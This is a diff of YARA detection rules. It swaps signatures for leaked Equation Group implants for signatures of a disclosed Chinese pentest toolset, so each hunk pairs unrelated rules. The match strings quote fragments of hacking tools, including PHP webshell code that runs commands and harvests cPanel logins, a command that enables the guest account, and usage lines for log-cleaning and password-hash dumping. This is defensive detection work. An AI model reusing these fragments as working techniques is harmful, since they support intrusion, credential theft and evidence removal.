 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6a30efb87b28e1a136a66c7708178c27d63a4a76c9c839b2fc43853158cb55ff"
 
 	strings:
-		$s1 = "_lib_version" ascii
-		$s2 = ",%02d%03d" fullword ascii
-		$s3 = "TRANSIT" fullword ascii
+		$s1 = "wwwscan.exe" fullword wide
+		$s2 = "WWWScan Gui" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 200KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Morerats_Client_Noprep : FILE
+rule SIGNATURE_BASE_CN_Honker_Gethashes_2 : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file GetHashes.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "27e9e51a-c853-5dcc-97d2-d3d31c5ccfac"
-		date = "2017-04-09"
+		id = "31117d2e-caf1-58c9-8525-b40b73097928"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1188-L1203"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1807-L1823"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c27815333e05d318bc32d01e755386bc1d1dbfd9f2b92a460fbd0f703e9ba210"
-		score = 75
+		hash = "35ae9ccba8d607d8c19a065cf553070c54b091d8"
+		logic_hash = "778fde2c59d4523142c0ac5b5c953c9eedbbf3c00b406541c00c1aa1f1a9cc58"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a5b191a8ede8297c5bba790ef95201c516d64e2898efaeb44183f8fdfad578bb"
 
 	strings:
-		$x1 = "storestr = 'echo -n \"%s\" | Store --nullterminate --file=\"%s\" --set=\"%s\"' % (nopenargs, outfile, VAR_NAME)" fullword ascii
-		$x2 = "The NOPEN-args provided are injected into infile if it is a valid" fullword ascii
-		$x3 = " -i                do not autokill after 5 hours" fullword ascii
+		$s1 = "GetHashes.exe <SAM registry file> [System key file]" fullword ascii
+		$s2 = "GetHashes.exe $Local" fullword ascii
+		$s3 = "The system key doesn't match SAM registry file!" fullword ascii
 
 	condition:
-		( filesize < 9KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Cursezinger_Linuxrh7_3_V_2_0_0 : FILE
+rule SIGNATURE_BASE_SUSP_Patcher_Keygen_Indicators_Jun15 : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d4cab478-da1e-54ef-995a-897d1813619e"
-		date = "2017-04-09"
+		id = "4dd65e4b-8178-5576-9740-b3c80a8127e2"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1205-L1221"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1825-L1841"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fa56fe4dd44d266741a3f0b0edfc24660b260c1ade45c23171f22bc43a3bee75"
-		score = 75
+		hash = "e32f5de730e324fb386f97b6da9ba500cf3a4f8d"
+		logic_hash = "07735c380cf34aaabd5cc0e1b38e32b3d4ad86b7bb184188d446df537f66775e"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "af7c7d03f59460fa60c48764201e18f3bd3f72441fd2e2ff6a562291134d2135"
 
 	strings:
-		$s1 = ",%02d%03d" fullword ascii
-		$s2 = "[%.2u%.2u%.2u%.2u%.2u%.2u]" fullword ascii
-		$s3 = "__strtoll_internal" ascii
-		$s4 = "__strtoul_internal" ascii
+		$s0 = "<description>Patch</description>" fullword ascii
+		$s2 = "\\dup2patcher.dll" ascii
+		$s3 = "load_patcher" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 400KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 4000KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Seconddate_Implantstandalone_3_0_3 : FILE
+rule SIGNATURE_BASE_CN_Honker_Tuoku_Script_Oracle_2 : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file oracle.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "08b1aa88-8731-51db-b659-96147f509bcd"
-		date = "2017-04-09"
+		id = "b88a0faa-1616-5f1b-80dc-6e6a2f0cb671"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1223-L1238"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1843-L1858"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8d56f471104bfb2ef2bf730e5a8b60c123706f12eb52226895b123b16eed2883"
-		score = 75
+		hash = "865dd591b552787eda18ee0ab604509bae18c197"
+		logic_hash = "627d81323266d67a2402367918b4f6e7277367c3eb027af57ac6966f2a49472c"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d687aa644095c81b53a69c206eb8d6bdfe429d7adc2a57d87baf8ff8d4233511"
 
 	strings:
-		$s1 = "EFDGHIJKLMNOPQRSUT" fullword ascii
-		$s2 = "G8HcJ HcF LcF0LcN" fullword ascii
-		$s3 = "GhHcJ0HcF@LcF0LcN8H" fullword ascii
+		$s0 = "webshell" fullword ascii
+		$s1 = "Silic Group Hacker Army " fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 1000KB and all of them )
+		filesize < 3KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Watcher_Solaris_I386_V_3_3_0 : FILE
+rule SIGNATURE_BASE_CN_Honker_Net_Packet_Capt : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file net_packet_capt.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e75c6ed9-b6e6-530d-a6ac-40bd0477754f"
-		date = "2017-04-09"
+		id = "16e19be7-3805-5e2b-baa6-20554fb7a5cf"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1240-L1256"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1860-L1878"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "61ded97e99e6bdfe2738c6d73719b3182d970aba8ea9d7cab751349669129de2"
-		score = 75
+		hash = "2d45a2bd9e74cf14c1d93fff90c2b0665f109c52"
+		logic_hash = "b158199a27f1260da5f5c1a8e99bb1cc3d19fe2a10577cc5932f097ff39d4ef8"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "395ec2531970950ffafde234dded0cce0c95f1f9a22763d1d04caa060a5222bb"
 
 	strings:
-		$s1 = "getexecname" fullword ascii
-		$s2 = "invalid option `" fullword ascii
-		$s6 = "__fpstart" ascii
-		$s12 = "GHFIJKLMNOPQRSTUVXW" fullword ascii
+		$s1 = "(*.sfd)" fullword ascii
+		$s2 = "GetLaBA" fullword ascii
+		$s3 = "GAIsProcessorFeature" fullword ascii
+		$s4 = "- Gablto " ascii
+		$s5 = "PaneWyedit" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 700KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Gr_Dev_Bin_Now : FILE
+rule SIGNATURE_BASE_CN_Honker_Cleaniislog : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file CleanIISLog.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9ec19323-85d5-5edf-99eb-b452c09b870a"
-		date = "2017-04-09"
+		id = "3931ba63-faf5-5b44-879c-105cd2812712"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1258-L1272"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1880-L1894"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1d7f009c5593ac1b1517024b828b016d705b63f6812a49d909f35c34b936e6d7"
-		score = 75
+		hash = "827cd898bfe8aa7e9aaefbe949d26298f9e24094"
+		logic_hash = "35b428d6178196b0dc6ac2ea3f0ee1dfbf6a98ead2356cb2a35d3d6b780538cc"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f5ed8312fc6e624b04e1e2d6614f3c651c9e9902ff41f4d069c32caca0869fa4"
 
 	strings:
-		$x1 = "HTTP_REFERER=\"https://127.0.0.1:6655/cgi/redmin?op=cron&action=once\"" fullword ascii
-		$x2 = "exec /usr/share/redmin/cgi/redmin" fullword ascii
+		$s1 = "Usage: CleanIISLog <LogFile>|<.> <CleanIP>|<.>" fullword ascii
 
 	condition:
-		( filesize < 1KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Gr_Dev_Bin_Post : FILE
+rule SIGNATURE_BASE_CN_Honker_HASH_Pwhash : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file pwhash.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9ec19323-85d5-5edf-99eb-b452c09b870a"
-		date = "2017-04-09"
+		id = "5d8c3648-a725-5f01-9800-b75b8c740cf1"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1274-L1287"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1896-L1911"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ffd95302df11d1ebab37817e967a1ad4d1e85e62b38a0ccd6adf0f36925e64c1"
-		score = 75
+		hash = "689056588f95749f0382d201fac8f58bac393e98"
+		logic_hash = "a77ae11c35dac3cfb1a2970460d4883feed7fbd3e8a860fa7facaad7ddcd1182"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c1546155efa95dbc4e3cc95299a3968fc075f89d33164e78b00b76c7d08a0591"
 
 	strings:
-		$x1 = "op=cron&action=once&frame=cronOnceFrame&cronK=cronV&cronCommand=%2Ftmp%2Ftmpwatch&time=12%3A12+01%2F28%2F2005" ascii
+		$s1 = "Example: quarks-pwdump.exe --dump-hash-domain --with-history" fullword ascii
+		$s2 = "quarks-pwdump.exe <options> <NTDS file>" fullword ascii
 
 	condition:
-		( filesize < 1KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Curseyo_Win2K_V_1_0_0 : FILE
+rule SIGNATURE_BASE_CN_Honker_Cleaner_Cl_2 : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file cl.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8161907d-d6bd-58c5-806d-387321b93b21"
-		date = "2017-04-09"
+		id = "9aa36c0a-9e0f-5274-bebe-9179d81b05f7"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1289-L1306"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1913-L1928"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ad9bb848a0c4805a14465ff44e3c967c9afa7369536a211a8a1fb100902fbb55"
-		score = 75
+		hash = "523084e8975b16e255b56db9af0f9eecf174a2dd"
+		logic_hash = "865354152f8441009aaad9022f64c3a014c4df0549b648d66959df56893ab98a"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5dc77614764b23a38610fdd8abe5b2274222f206889e4b0974a3fea569055ed6"
 
 	strings:
-		$s1 = "0123456789abcdefABCEDF:" fullword ascii
-		$op0 = { c6 06 5b 8b bd 70 ff ff ff 8b 9d 64 ff ff ff 0f }
-		$op1 = { 55 b8 ff ff ff ff 89 e5 83 ec 28 89 7d fc 8b 7d }
-		$op2 = { ff 05 10 64 41 00 89 34 24 e8 df 1e 00 00 e9 31 }
+		$s0 = "cl -eventlog All/Application/System/Security" fullword ascii
+		$s1 = "clear iislog error!" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Gr : FILE
+rule SIGNATURE_BASE_CN_Honker_Sqlmap_Python_Run : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file Run.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9ec19323-85d5-5edf-99eb-b452c09b870a"
-		date = "2017-04-09"
+		id = "308d929a-0f38-5db4-92c2-2a7bf25bb64f"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1308-L1322"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1930-L1946"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6df2a36e51fbe23e090094a91da76ca881a65d7e129c6e428ffef13787f230bc"
-		score = 75
+		hash = "a51479a1c589f17c77d22f6cf90b97011c33145f"
+		logic_hash = "86d53a06e2f71b7ce7785c4c8ac017a4552b40c16d64474db4e22dbe1afd9e52"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d3cd725affd31fa7f0e2595f4d76b09629918612ef0d0307bb85ade1c3985262"
 
 	strings:
-		$s1 = "if [ -f /tmp/tmpwatch ] ; then" fullword ascii
-		$s2 = "echo \"bailing. try a different name\"" fullword ascii
+		$s1 = ".\\Run.log" fullword ascii
+		$s2 = "[root@Hacker~]# Sqlmap " fullword ascii
+		$s3 = "%sSqlmap %s" fullword ascii
 
 	condition:
-		( filesize < 1KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Curseroot_Win2K_V_2_1_0 : FILE
+rule SIGNATURE_BASE_CN_Honker_Saminside : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file SAMInside.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bd2257ef-8170-547d-9c5e-7ff03404495c"
-		date = "2017-04-09"
+		id = "c5ac9f0a-d1af-59c3-9c13-91153180f3d8"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1324-L1340"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1948-L1963"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "64ea35c9287ed35b5e7fbc8aaa228f87bc003111dd6fc35f5277eeea5f371a2c"
-		score = 75
+		hash = "707ba507f9a74d591f4f2e2f165ff9192557d6dd"
+		logic_hash = "8f095a554121e16b63fdd8d47d957665aed7a2a5885813fa78bc4cee3b8923d3"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a1637948ed6ebbd2e582eb99df0c06b27a77c01ad1779b3d84c65953ca2cb603"
 
 	strings:
-		$s1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%s,%s" fullword ascii
-		$op0 = { c7 44 24 04 ff ff ff ff 89 04 24 e8 46 65 01 00 }
-		$op1 = { 8d 5d 88 89 1c 24 e8 24 1b 01 00 be ff ff ff ff }
-		$op2 = { d3 e0 48 e9 0c ff ff ff 8b 45 }
+		$s0 = "www.InsidePro.com" fullword wide
+		$s1 = "SAMInside.exe" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and $s1 and 2 of ( $op* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 650KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Cursewham_Curserazor_Cursezinger_Curseroot_Win2K : FILE
+rule SIGNATURE_BASE_CN_Honker_Webscan_Wwwscan : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file wwwscan.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6a877998-7021-54cb-b068-452d005955b6"
-		date = "2017-04-09"
+		id = "defe0024-f94a-560a-a9f6-b3849b41f9bb"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1342-L1362"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1965-L1981"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a5a8e6a516b51c2eed616c80a1162990c1dda4460ec7786793d66820ca15b5a4"
-		score = 75
+		hash = "6dbffa916d0f0be2d34c8415592b9aba690634c7"
+		logic_hash = "9d2eee1c1783a08a2eae86d4ea77bdb67db8cf0055a24d88ea09411e63018e8c"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "aff27115ac705859871ab1bf14137322d1722f63705d6aeada43d18966843225"
-		hash2 = "7a25e26950bac51ca8d37cec945eb9c38a55fa9a53bc96da53b74378fb10b67e"
 
 	strings:
-		$s1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%s,%s" fullword ascii
-		$s3 = ",%02d%03d" fullword ascii
-		$s4 = "[%.2u%.2u%.2u%.2u%.2u%.2u]" fullword ascii
-		$op1 = { 7d ec 8d 74 3f 01 0f af f7 c1 c6 05 }
-		$op2 = { 29 f1 89 fb d3 eb 89 f1 d3 e7 }
-		$op3 = { 7d e4 8d 5c 3f 01 0f af df c1 c3 05 }
+		$s1 = "%s www.target.com -p 8080 -m 10 -t 16" fullword ascii
+		$s2 = "GET /nothisexistpage.html HTTP/1.1" fullword ascii
+		$s3 = "<Usage>:  %s <HostName|Ip> [Options]" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Watcher_Linux_I386_V_3_3_0 : FILE
+rule SIGNATURE_BASE_CN_Honker_Sig_3389_2_3389 : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file 3389.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3c5dc02b-a11a-5c61-8069-641ba90668ec"
-		date = "2017-04-09"
+		id = "8b2f5f6d-4d7b-561c-bd77-2de351e5aca8"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1364-L1381"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1983-L1999"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "245662b561178f4d929ed858811846b2a49dc80af25396864a3d7bd90d16ac2b"
-		score = 75
+		hash = "48d1974215e5cb07d1faa57e37afa91482b5a376"
+		logic_hash = "97e2a08dd391de44fc01c44ca6463aa009e93ad199a330eb99aaa809f14f2ef0"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ce4c9bfa25b8aad8ea68cc275187a894dec5d79e8c0b2f2f3ec4184dc5f402b8"
 
 	strings:
-		$s1 = "invalid option `" fullword ascii
-		$s8 = "readdir64" fullword ascii
-		$s9 = "89:z89:%r%opw" fullword wide
-		$s13 = "Ropopoprstuvwypypop" fullword wide
-		$s17 = "Missing argument for `-x'." fullword ascii
+		$s1 = "C:\\Documents and Settings\\Administrator\\" ascii
+		$s2 = "net user guest /active:yes" fullword ascii
+		$s3 = "\\Microsoft Word.exe" ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 700KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Charm_Saver_Win2K_V_2_0_0 : FILE
+rule SIGNATURE_BASE_CN_Honker_PHP_Php11 : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file php11.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9c2e3b70-ffa2-598a-9f99-f7a574b06c14"
-		date = "2017-04-09"
+		id = "e20eaab1-9799-5e61-9a25-3ac0dcce5f7f"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1383-L1399"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2001-L2017"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "87cea1f46a3165485274165e840a4945d6f6a6f9ff7fd011e685e8bb90acae8a"
-		score = 75
+		hash = "dcc8226e7eb20e4d4bef9e263c14460a7ee5e030"
+		logic_hash = "d32b0540521a6b1d65c224bdee463813d72846c26f27326a092bdf3b90c3ae7c"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0f7936a37482532a8ba5df4112643ed7579dd0e59181bfca9c641b9ba0a9912f"
 
 	strings:
-		$s2 = "0123456789abcdefABCEDF:" fullword ascii
-		$op0 = { b8 ff ff ff ff 7f 65 eb 30 8b 55 0c 89 d7 0f b6 }
-		$op2 = { ba ff ff ff ff 83 c4 6c 89 d0 5b 5e 5f 5d c3 90 }
+		$s1 = "<tr><td><b><?php if (!$win) {echo wordwrap(myshellexec('id'),90,'<br>',1);} else" ascii
+		$s2 = "foreach (glob($_GET['pathtomass'].\"/*.htm\") as $injectj00) {" fullword ascii
+		$s3 = "echo '[cPanel Found] '.$login.':'.$pass.\"  Success\\n\";" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them )
+		filesize < 800KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Cursehappy_Win2K_V_6_1_0 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webcruiserwvs : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file WebCruiserWVS.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7b75d4aa-2cbc-57fc-8fda-015bbc1fb25e"
-		date = "2017-04-09"
+		id = "16bed1e8-a1f0-5fcf-9c03-83625a388547"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1401-L1415"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2019-L2034"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3bf5878c3be20a7a543d4937c6d820df726062e39ee262a6c31f7e91b32fd55e"
-		score = 75
+		hash = "6c90a9ed4c8a141a343dab1b115cc840a7190304"
+		logic_hash = "dd37765488f07299048e9b8fc552120e76d628e0adcaf474fce9bfe60774a0c8"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "eb669afd246a7ac4de79724abcce5bda38117b3138908b90cac58936520ea632"
 
 	strings:
-		$op1 = { e8 24 2c 01 00 85 c0 89 c6 ba ff ff ff ff 74 d6 }
-		$op2 = { 89 4c 24 04 89 34 24 89 44 24 08 e8 ce 49 ff ff }
+		$s0 = "id:uid:user:username:password:access:account:accounts:admin_id:admin_name:admin_" ascii
+		$s1 = "Created By WebCruiser - Web Vulnerability Scanner http://sec4app.com" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Morerats_Client_Store : FILE
+rule SIGNATURE_BASE_CN_Honker_Hookmsgina : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file Hookmsgina.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "de6de983-fad2-58cf-95be-57109436d5fc"
-		date = "2017-04-09"
